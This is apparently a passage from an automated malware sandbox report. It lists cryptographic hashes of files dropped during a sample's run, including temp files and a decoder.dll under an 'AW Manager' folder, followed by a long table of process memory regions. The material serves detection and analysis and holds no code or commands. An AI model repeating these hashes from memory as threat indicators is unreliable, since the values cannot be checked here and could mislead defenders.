                                                                                                                                f2f8732ae464738372ff274b7e481366cecdd2337210d4a3cbcd089c958a730c

                                                                                                                                SHA512

                                                                                                                                fac6bfe35b1ee08b3d42d330516a260d9cdb4a90bbb0491411a583029b92a59d20af3552372ea8fb3f59442b3945bf524ef284127f397ae7179467080be8e9b3

                                                                                                                              • \Users\Admin\AppData\Local\Temp\INA6737.tmp
                                                                                                                                MD5

                                                                                                                                07df9ca625c2cb953b2a7f7f699cee7c

                                                                                                                                SHA1

                                                                                                                                3225e84b51ba76eb650231c94231b70b70b997c9

                                                                                                                                SHA256

                                                                                                                                265d462e9bd3fc4bdf925590a852707a52e0707407fdc4ba40a468542e8dbb77

                                                                                                                                SHA512

                                                                                                                                104a32900ac3f7a3815ce4670aa430677eb48bd3b8a5e17f0a05c333b8faf776756408784c8191ea51ffd54ad52d7fcbf2611570a275efdc6bf1b04b5706f9fd

                                                                                                                              • \Users\Admin\AppData\Local\Temp\MSI6804.tmp
                                                                                                                                MD5

                                                                                                                                d07ddd437009ebb9c21882579bf2df0d

                                                                                                                                SHA1

                                                                                                                                a24a636db25ed29e5353fa5d274bf80c2ab8ad98

                                                                                                                                SHA256

                                                                                                                                c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

                                                                                                                                SHA512

                                                                                                                                8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

                                                                                                                              • \Users\Admin\AppData\Local\Temp\MSI8EC7.tmp
                                                                                                                                MD5

                                                                                                                                5a25fb13ed470b77eefd2eb89cb62c47

                                                                                                                                SHA1

                                                                                                                                3dbe567e3c8c8cd0f7e3c71a2536578ee11bf2a6

                                                                                                                                SHA256

                                                                                                                                0dca4854897ca77080c57936ad5c7c6c5f5c656a5785c09c7d2c1d196e4f3336

                                                                                                                                SHA512

                                                                                                                                2ec64666ad42e955e91378af855da59d3bcfb4cc3574bf023dda878c7d3e3dec442625de6e6b0434d1caf86a525395b04038cf7fdc6c292405d9f19c6f4e9952

                                                                                                                              • \Users\Admin\AppData\Local\Temp\install.dll
                                                                                                                                MD5

                                                                                                                                b29f18a79fee5bd89a7ddf3b4be8aa23

                                                                                                                                SHA1

                                                                                                                                0396814e95dd6410e16f8dd0131ec492718b88da

                                                                                                                                SHA256

                                                                                                                                9d4eac47f833f3f02f2f1c295c91928f55e2e5ac1189743ffff680f4f745950e

                                                                                                                                SHA512

                                                                                                                                f47861ceb9f73ea9ff74d6c65b363005b6931086ae36a25599bf644649f84ff1769c78cb7fd48a51352baf28ef7d3f1dd36414bb15365ed04605c488d11d08cd

                                                                                                                              • \Users\Admin\AppData\Local\Temp\is-TLBTS.tmp\idp.dll
                                                                                                                                MD5

                                                                                                                                8f995688085bced38ba7795f60a5e1d3

                                                                                                                                SHA1

                                                                                                                                5b1ad67a149c05c50d6e388527af5c8a0af4343a

                                                                                                                                SHA256

                                                                                                                                203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006

                                                                                                                                SHA512

                                                                                                                                043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

                                                                                                                              • \Users\Admin\AppData\Local\Temp\nso9ABC.tmp\System.dll
                                                                                                                                MD5

                                                                                                                                2e025e2cee2953cce0160c3cd2e1a64e

                                                                                                                                SHA1

                                                                                                                                dec3da040ea72d63528240598bf14f344efb2a76

                                                                                                                                SHA256

                                                                                                                                d821a62802900b068dcf61ddc9fdff2f7ada04b706815ab6e5038b21543da8a5

                                                                                                                                SHA512

                                                                                                                                3cafce382b605a68e5a3f35f95b32761685112c5a9da9f87b0a06ec13da4155145bd06ffb63131bf87c3dc8bd61cb085884c5e78c832386d70397e3974854860

                                                                                                                              • \Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
                                                                                                                                MD5

                                                                                                                                858c99cc729be2db6f37e25747640333

                                                                                                                                SHA1

                                                                                                                                69070df2849c1373fae9a4b4a884f14fd8ae39f1

                                                                                                                                SHA256

                                                                                                                                d4f839922c901906f549c687ccc58a010861a6a006a15c32e1a7f2e3d703b4d9

                                                                                                                                SHA512

                                                                                                                                f53e00bbedba0edbc363589a2be76ac836915b95d8e887bf5ee4080f34d773a19d9dd43e715569ea21f85a9434de2a16b51c52b00afd89d268bfc929e1e8e695

                                                                                                                              • \Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
                                                                                                                                MD5

                                                                                                                                858c99cc729be2db6f37e25747640333

                                                                                                                                SHA1

                                                                                                                                69070df2849c1373fae9a4b4a884f14fd8ae39f1

                                                                                                                                SHA256

                                                                                                                                d4f839922c901906f549c687ccc58a010861a6a006a15c32e1a7f2e3d703b4d9

                                                                                                                                SHA512

                                                                                                                                f53e00bbedba0edbc363589a2be76ac836915b95d8e887bf5ee4080f34d773a19d9dd43e715569ea21f85a9434de2a16b51c52b00afd89d268bfc929e1e8e695

                                                                                                                              • memory/192-369-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/340-206-0x000002513E990000-0x000002513EA00000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                448KB

                                                                                                                              • memory/808-114-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/1040-232-0x000001C69AD00000-0x000001C69AD70000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                448KB

                                                                                                                              • memory/1060-214-0x000001793D4B0000-0x000001793D520000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                448KB

                                                                                                                              • memory/1092-226-0x000001FEFE790000-0x000001FEFE800000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                448KB

                                                                                                                              • memory/1240-254-0x0000021D58A90000-0x0000021D58B00000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                448KB

                                                                                                                              • memory/1248-252-0x000001C40A440000-0x000001C40A4B0000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                448KB

                                                                                                                              • memory/1260-147-0x0000000001392000-0x0000000001394000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/1260-150-0x0000000001395000-0x0000000001396000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/1260-141-0x0000000001390000-0x0000000001392000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/1260-136-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/1424-247-0x000001AE08F60000-0x000001AE08FD0000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                448KB

                                                                                                                              • memory/1960-250-0x0000020D5D6D0000-0x0000020D5D740000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                448KB

                                                                                                                              • memory/2060-352-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/2180-126-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                88KB

                                                                                                                              • memory/2180-124-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/2396-210-0x00000157A6FC0000-0x00000157A700B000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                300KB

                                                                                                                              • memory/2396-215-0x00000157A75A0000-0x00000157A7610000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                448KB

                                                                                                                              • memory/2412-220-0x0000026594790000-0x0000026594800000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                448KB

                                                                                                                              • memory/2452-301-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/2524-116-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/2524-118-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/2624-120-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/2624-123-0x0000000002B50000-0x0000000002B52000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/2636-256-0x000001ACBAA10000-0x000001ACBAA80000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                448KB

                                                                                                                              • memory/2692-248-0x0000019D06E70000-0x0000019D06EE0000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                448KB

                                                                                                                              • memory/2788-221-0x0000026543460000-0x00000265434D0000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                448KB

                                                                                                                              • memory/3060-310-0x0000000003470000-0x0000000003487000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                92KB

                                                                                                                              • memory/3624-184-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/3672-146-0x0000000000EA0000-0x0000000000EA2000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/3672-149-0x0000000000EA4000-0x0000000000EA5000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/3672-151-0x0000000000EA5000-0x0000000000EA7000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/3672-148-0x0000000000EA2000-0x0000000000EA4000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/3672-143-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/3716-153-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/3788-131-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/3788-128-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4016-132-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4016-140-0x00000000022A0000-0x00000000022A2000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/4020-181-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4104-185-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4128-305-0x000001E786200000-0x000001E786301000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                1.0MB

                                                                                                                              • memory/4128-198-0x00007FF7ABDC4060-mapping.dmp
                                                                                                                              • memory/4128-231-0x000001E783C00000-0x000001E783C70000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                448KB

                                                                                                                              • memory/4196-366-0x0000000007013000-0x0000000007014000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4196-365-0x0000000007012000-0x0000000007013000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4196-364-0x0000000007010000-0x0000000007011000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4196-361-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4212-304-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4244-154-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4244-158-0x0000000002E40000-0x0000000002E42000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/4272-203-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4280-176-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4288-353-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4288-316-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4340-157-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4392-190-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4492-164-0x0000000000A40000-0x0000000000A52000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                72KB

                                                                                                                              • memory/4492-159-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4492-163-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/4548-162-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4600-328-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4600-194-0x0000000000D72000-0x0000000000E73000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                1.0MB

                                                                                                                              • memory/4600-189-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4600-205-0x00000000043E0000-0x000000000443C000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                368KB

                                                                                                                              • memory/4624-358-0x00000000066A0000-0x00000000066A1000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4624-359-0x00000000066A2000-0x00000000066A3000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4624-363-0x00000000066A3000-0x00000000066A4000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4624-355-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4716-177-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4724-165-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4760-286-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4760-291-0x0000000000470000-0x00000000005BA000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                1.3MB

                                                                                                                              • memory/4760-290-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/4784-356-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4844-180-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4920-360-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4948-170-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5084-171-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5100-303-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5124-211-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5164-292-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5260-274-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5260-281-0x00000000001D0000-0x00000000001DC000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                48KB

                                                                                                                              • memory/5264-344-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5312-275-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5320-297-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5336-351-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5340-323-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5384-368-0x0000000004A90000-0x0000000004A91000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5384-367-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5440-239-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5536-350-0x0000000009EE0000-0x0000000009EE1000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5536-326-0x0000000007D10000-0x0000000007D11000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5536-325-0x0000000007520000-0x0000000007521000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5536-322-0x00000000075B0000-0x00000000075B1000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5536-327-0x0000000007D80000-0x0000000007D81000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5536-357-0x0000000006F33000-0x0000000006F34000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5536-331-0x0000000007FD0000-0x0000000007FD1000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5536-332-0x0000000007DF0000-0x0000000007DF1000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5536-333-0x0000000008900000-0x0000000008901000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5536-334-0x0000000008700000-0x0000000008701000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5536-324-0x0000000006F32000-0x0000000006F33000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5536-317-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5536-347-0x0000000009650000-0x0000000009651000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5536-348-0x00000000095D0000-0x00000000095D1000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5536-349-0x0000000009620000-0x0000000009621000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5536-321-0x0000000006F30000-0x0000000006F31000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5536-320-0x0000000006F40000-0x0000000006F41000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/5568-280-0x0000000000402F68-mapping.dmp
                                                                                                                              • memory/5568-278-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                48KB

                                                                                                                              • memory/5624-289-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5668-284-0x0000000000400000-0x0000000002BF4000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                40.0MB

                                                                                                                              • memory/5668-258-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5668-279-0x0000000004700000-0x0000000004791000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                580KB

                                                                                                                              • memory/5724-261-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5756-339-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5816-362-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5820-262-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5828-354-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5900-264-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5948-265-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/6004-266-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/6016-267-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/6024-268-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/6120-313-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/6140-273-0x0000000000000000-mapping.dmp